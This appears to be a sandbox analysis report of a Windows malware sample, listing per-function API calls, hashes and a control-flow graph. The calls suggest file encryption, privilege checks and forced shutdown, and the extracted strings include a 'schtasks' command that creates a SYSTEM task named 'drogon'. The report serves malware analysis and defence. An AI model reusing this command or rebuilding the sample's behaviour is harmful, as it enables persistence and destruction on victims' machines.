                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                      • String ID:
                                                                      • API String ID: 2692407486-0
                                                                      • Opcode ID: a918a0a33f3c80a4f67bea67e34a213124affd2ca265c579f231589a87eac20f
                                                                      • Instruction ID: dbd1758b1921983173a8954ce5ab68600c1a8f5240a6ba968e4e244dc5ad1d94
                                                                      • Opcode Fuzzy Hash: a918a0a33f3c80a4f67bea67e34a213124affd2ca265c579f231589a87eac20f
                                                                      • Instruction Fuzzy Hash: A8217F71100704AFFB202BB4EC889A7BBECEF08355B448D29FE06D1470EB69FC418A21
                                                                      Function 04855613 Relevance: 13.6, APIs: 9, Instructions: 87encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855636
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0485564C
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855662
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04855682
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0485568D
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 048556A6
                                                                      • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 048556B5
                                                                      • LocalFree.KERNEL32(00000000), ref: 048556BF
                                                                      • LocalFree.KERNEL32(?), ref: 048556C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                      • String ID:
                                                                      • API String ID: 3940947887-0
                                                                      • Opcode ID: e6f0eda7302d488c0e166ea45fd8d5d419ae5d468853cbfb726dc5aa71bbab68
                                                                      • Instruction ID: 0594cd8f610f89167c79b309a1c97cb85ee3ce4c5249897c49a7af2ef078f0ac
                                                                      • Opcode Fuzzy Hash: e6f0eda7302d488c0e166ea45fd8d5d419ae5d468853cbfb726dc5aa71bbab68
                                                                      • Instruction Fuzzy Hash: 5A215E71501218BADF11AF929C48EDFBFBDEF097A0F008411FE08E60A4D6759A01DBA0
                                                                      Function 04855E9F Relevance: 12.2, APIs: 8, Instructions: 151fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PathCombineW.SHLWAPI(?,?,04861554,?,?), ref: 04855EC8
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 04855EE3
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04855F09
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 04855FB1
                                                                      • StrStrIW.SHLWAPI(?,04863014), ref: 04855FE9
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 0485601B
                                                                      • FindNextFileW.KERNELBASE(?,?), ref: 04856065
                                                                      • FindClose.KERNELBASE(?), ref: 04856077
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 1251538951-0
                                                                      • Opcode ID: 77ba0297427a287237c5206a4951207835838becf5d31bc149b35f864ba47c8f
                                                                      • Instruction ID: db454f0ca9d1a53937090a7cf1bedc12bfe8478ee8c669688e5887e22d308f06
                                                                      • Opcode Fuzzy Hash: 77ba0297427a287237c5206a4951207835838becf5d31bc149b35f864ba47c8f
                                                                      • Instruction Fuzzy Hash: F451D431104205EFEB21EF24C8489AAB3AAEB90724F944F19ED56E70B4F736F549C752
                                                                      Function 04858192 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 048581AF
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 048581F2
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 048582AF
                                                                      • wsprintfW.USER32 ref: 048582CE
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Strings
                                                                      • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 048582C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                      • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                      • API String ID: 2586884543-3727968613
                                                                      • Opcode ID: a39fef13c3ed7a261fa57e3185d5611aa6cc1e0917dd4fa7294785090513a0ce
                                                                      • Instruction ID: 1a108f0fb7dd50380f30de3e7b92b1a0d77df28dc12ab71d659aa3caee5129d3
                                                                      • Opcode Fuzzy Hash: a39fef13c3ed7a261fa57e3185d5611aa6cc1e0917dd4fa7294785090513a0ce
                                                                      • Instruction Fuzzy Hash: B641E922A58348AAFB10DBE4EC16BFE73B5EF44B10F10591BE604FB1D0E6B55A84C359
                                                                      Function 04858A23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580BC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580CC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580DC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580EC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 04858126
                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04858A54
                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 04858A61
                                                                      • ExitProcess.KERNEL32 ref: 04858A68
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Strings
                                                                      • schtasks /Delete /F /TN drogon, xrefs: 04858A35
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                      • String ID: schtasks /Delete /F /TN drogon
                                                                      • API String ID: 3579268615-951750757
                                                                      • Opcode ID: 51245dc8a4bcaa0e1107230441f8ef7625de5c7e9713fe5da853cc3feaf834ae
                                                                      • Instruction ID: acc8d2d4f8eb5caf7a3849cab436d0aac1e686b8f8ffa12ea0f3e079f9b7baeb
                                                                      • Opcode Fuzzy Hash: 51245dc8a4bcaa0e1107230441f8ef7625de5c7e9713fe5da853cc3feaf834ae
                                                                      • Instruction Fuzzy Hash: FBE04F20262320B5E67376266C0DFDB2D8DEF02758F048F01FE49E00A087DD6991C5F6
                                                                      Function 04859016 Relevance: 6.1, APIs: 4, Instructions: 109memorylibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04859090
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 048590BA
                                                                      • GetProcAddress.KERNELBASE(00000000,?), ref: 048590FD
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0485913D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                      • String ID:
                                                                      • API String ID: 3300690313-0
                                                                      • Opcode ID: 35d6816d578b28a41ac404931137f27b0bce38280485aacfc33b5d5e9581e1a8
                                                                      • Instruction ID: a746f04c70323b9d27f7f8b06af1bd08c921a091e0520a3a8161238face844fd
                                                                      • Opcode Fuzzy Hash: 35d6816d578b28a41ac404931137f27b0bce38280485aacfc33b5d5e9581e1a8
                                                                      • Instruction Fuzzy Hash: EB414CB1940216EFDF10DF98C888BA9B7F8FF04319F1589A9D815E7261E778E980CB50
                                                                      Function 04856085 Relevance: 6.0, APIs: 4, Instructions: 49encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560A6
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560BA
                                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,048562E0,?,?,?,?), ref: 048560D3
                                                                      • CryptDestroyHash.ADVAPI32(?,?,?,?,048562E0,?,?,?,?), ref: 048560DF
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 048555BC
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 048555CB
                                                                        • Part of subcall function 0485559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 048555DA
                                                                        • Part of subcall function 0485559B: LocalAlloc.KERNEL32(00000040,?), ref: 048555EE
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04855601
                                                                        • Part of subcall function 0485559B: LocalFree.KERNEL32(?), ref: 04855606
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                      • String ID:
                                                                      • API String ID: 797921460-0
                                                                      • Opcode ID: 719d7c55e6e536056ec7d9367e1f0b21f4581f915eff00d3886d89f1a52077a7
                                                                      • Instruction ID: b43053995436b7922792199048d78334e96e44af559bd28d62adb6c54fcfcce0
                                                                      • Opcode Fuzzy Hash: 719d7c55e6e536056ec7d9367e1f0b21f4581f915eff00d3886d89f1a52077a7
                                                                      • Instruction Fuzzy Hash: 5C015E71900208BFEB10AF94EC88DAEBBBDEB04750B504879F905F6150EA75AE449B20
                                                                      Function 048584EE Relevance: 6.0, APIs: 4, Instructions: 35processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048584FC
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0485851B
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0485853E
                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 04858556
                                                                        • Part of subcall function 0485841D: GetCurrentProcessId.KERNEL32(?,04858555,?,?), ref: 04858430
                                                                        • Part of subcall function 0485841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04858555,?,?), ref: 0485844C
                                                                        • Part of subcall function 0485841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04858555,?,?), ref: 04858464
                                                                        • Part of subcall function 0485841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04858555,?,?), ref: 0485847D
                                                                        • Part of subcall function 0485841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 048584A3
                                                                        • Part of subcall function 0485841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 048584BA
                                                                        • Part of subcall function 0485841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 048584CB
                                                                        • Part of subcall function 0485841D: FreeSid.ADVAPI32(?), ref: 048584D4
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(?), ref: 048584DD
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(?,?,?,?,04858555,?,?), ref: 048584E2
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(00000000,?,?,?,04858555,?,?), ref: 048584E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$Token$OpenProcess32$AllocateCheckCreateCurrentDuplicateFirstFreeInitializeMembershipNextSnapshotTerminateToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3061973000-0
                                                                      • Opcode ID: 3a92dc9f3fac5a45bede81b601b9b5869148f9aa0022bb07b121008f205066c6
                                                                      • Instruction ID: b2c67a8a1abfe387828db734426a3df044e48ef1cb90cbc6ed07d06e8f32c8a7
                                                                      • Opcode Fuzzy Hash: 3a92dc9f3fac5a45bede81b601b9b5869148f9aa0022bb07b121008f205066c6
                                                                      • Instruction Fuzzy Hash: EDF09631501628A7DB217BB4BC0DFEEBABCEB09314F504A92ED15E20B0E778AD54CE55
                                                                      Function 0485554A Relevance: 6.0, APIs: 4, Instructions: 30encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04855561
                                                                      • GetLastError.KERNEL32(?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485556B
                                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04855581
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485558E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                      • String ID:
                                                                      • API String ID: 2963463078-0
                                                                      • Opcode ID: 2816cf06ebcc3b46bbdc4e34a8fe1f3c2332288c7efe5d2df0168882e35124bb
                                                                      • Instruction ID: 1604d95e0311cbe266d06393f2fb3b98511a3fe5c3c3dbd3a3971551e739cd1e
                                                                      • Opcode Fuzzy Hash: 2816cf06ebcc3b46bbdc4e34a8fe1f3c2332288c7efe5d2df0168882e35124bb
                                                                      • Instruction Fuzzy Hash: FDF01C36500208FBDF109BA6ED09F8E7AFAEBC4751F208414FA05D2110D638AE05EB20
                                                                      Function 04855507 Relevance: 4.5, APIs: 3, Instructions: 29encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,048562C3,?), ref: 04855520
                                                                      • GetLastError.KERNEL32(?,048562C3,?), ref: 04855528
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,048562C3,?), ref: 0485553E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AcquireContextCrypt$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2779411412-0
                                                                      • Opcode ID: 07553151866a4df4ddfe0248d59bbdf0d43e7cde5e24bc1a71e2b9fd522a2bdb
                                                                      • Instruction ID: 1a21cc24cf065d0766b55c4d6573515691d710675989e829563f615b6f9bcdb5
                                                                      • Opcode Fuzzy Hash: 07553151866a4df4ddfe0248d59bbdf0d43e7cde5e24bc1a71e2b9fd522a2bdb
                                                                      • Instruction Fuzzy Hash: B9E04F7138431D7AFB201998EC81F563A9DEB18754F508426FB00E6191CAD5AD0457A4
                                                                      Function 04857D4E Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NetServerGetInfo.NETAPI32(00000000,00000065,?,6F994950,?,?,04858C7C), ref: 04857D5F
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,04858C7C), ref: 04857D82
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferFreeInfoServer
                                                                      • String ID:
                                                                      • API String ID: 3855943681-0
                                                                      • Opcode ID: 12efc3faa45e546896ec4e7f66034a47ceb4e9cf440997adff9675e8826111ee
                                                                      • Instruction ID: bf5630e32987148b3cd441d0c33b868a19a65c44665809a5276db0246a311c5c
                                                                      • Opcode Fuzzy Hash: 12efc3faa45e546896ec4e7f66034a47ceb4e9cf440997adff9675e8826111ee
                                                                      • Instruction Fuzzy Hash: D5E09271701724A7EB24CA55DD08BBA766CDF00A91F008619AC41E2114E324FE0587D0
                                                                      Function 048579D7 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 237threadsleepprocessCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 86 48579d7-48579ec call 4857897 89 48579fc-4857a03 call 4857f04 86->89 90 48579ee-48579f7 call 485923f 86->90 94 4857a05-4857a07 ExitProcess 89->94 95 4857a0d-4857a14 89->95 90->89 96 4857a16 call 4857e8e 95->96 97 4857a1b-4857acf call 48584ee call 48510a7 WSAStartup call 4856c5f * 2 InitializeCriticalSection call 485652f call 4857dd0 call 4858192 CreateEventW CreateThread 95->97 96->97 113 4857ad5-4857ae8 CreateThread 97->113 114 4857b99-4857ba0 97->114 115 4857af8-4857b0a call 4856cc8 113->115 116 4857aea-4857af1 113->116 117 4857ba2-4857baf call 485554a 114->117 118 4857bde-4857bf1 Sleep call 4858a23 114->118 128 4857b63-4857b93 call 4856cc8 CreateThread call 485a420 Sleep 115->128 129 4857b0c-4857b31 call 4856c5f call 48585fb 115->129 116->115 119 4857af3 call 4857146 116->119 117->118 130 4857bb1 117->130 124 4857bf6-4857c16 GetSystemDirectoryW 118->124 119->115 131 4857cc0-4857cc2 124->131 132 4857c1c-4857c30 lstrcatW 124->132 128->114 129->128 148 4857b33-4857b39 129->148 135 4857bb3-4857bcd 130->135 132->131 137 4857c36-4857c4b GetModuleFileNameW 132->137 135->135 136 4857bcf-4857bd9 call 485636b 135->136 136->118 137->131 141 4857c4d-4857c7a PathFindFileNameW wsprintfW 137->141 144 4857c7c-4857c80 141->144 144->144 147 4857c82-4857c87 144->147 149 4857c8a-4857c8e 147->149 150 4857b3c-4857b4c call 485a3b1 call 485796e 148->150 149->149 151 4857c90-4857cba CreateProcessW ExitProcess 149->151 156 4857b4e-4857b56 call 4856e66 150->156 157 4857b5b-4857b61 150->157 156->157 157->128 157->150
                                                                      APIs
                                                                        • Part of subcall function 04857897: GetTickCount.KERNEL32 ref: 048578AF
                                                                        • Part of subcall function 04857897: srand.MSVCRT ref: 048578B2
                                                                        • Part of subcall function 04857897: GetTickCount.KERNEL32 ref: 048578B9
                                                                        • Part of subcall function 04857897: GetModuleFileNameW.KERNEL32(04867BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04857926
                                                                      • ExitProcess.KERNEL32 ref: 04857A07
                                                                        • Part of subcall function 0485923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,048579FC,?,?,?), ref: 0485927B
                                                                        • Part of subcall function 0485923F: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,048579FC,?,?,?), ref: 04859294
                                                                        • Part of subcall function 0485923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04859303
                                                                        • Part of subcall function 0485923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04859323
                                                                      • WSAStartup.WS2_32(00000202,048681E0), ref: 04857A3D
                                                                      • InitializeCriticalSection.KERNEL32(04867B9C,00000008,048567F9,0485682F,000000FF,00000024,04856AA8,00000000,0000FFFF), ref: 04857A80
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04857AAD
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858A6F,00000000,00000000,00000000), ref: 04857AC6
                                                                      • CreateThread.KERNELBASE(00000000,00000000,048577D1,00000000,00000000,00000000), ref: 04857ADF
                                                                        • Part of subcall function 04857E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04857EB1
                                                                        • Part of subcall function 04857E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04857EC3
                                                                      • CreateThread.KERNELBASE(00000000,00000000,0485A1A9,00000000,00000000,00000000), ref: 04857B78
                                                                        • Part of subcall function 0485A420: GetProcessHeap.KERNEL32(00000008,00000004,74DF0F10,?,00000000,?,?,04857B89,000000FF), ref: 0485A436
                                                                        • Part of subcall function 0485A420: HeapAlloc.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A439
                                                                        • Part of subcall function 0485A420: CreateThread.KERNELBASE(00000000,00000000,0485A333,00000000,00000000,00000000), ref: 0485A454
                                                                        • Part of subcall function 0485A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04857B89,000000FF), ref: 0485A463
                                                                        • Part of subcall function 0485A420: HeapFree.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A466
                                                                      • Sleep.KERNELBASE(?,000000FF), ref: 04857B93
                                                                      • Sleep.KERNELBASE(?), ref: 04857BEB
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04857C0E
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04857C28
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C), ref: 04857C43
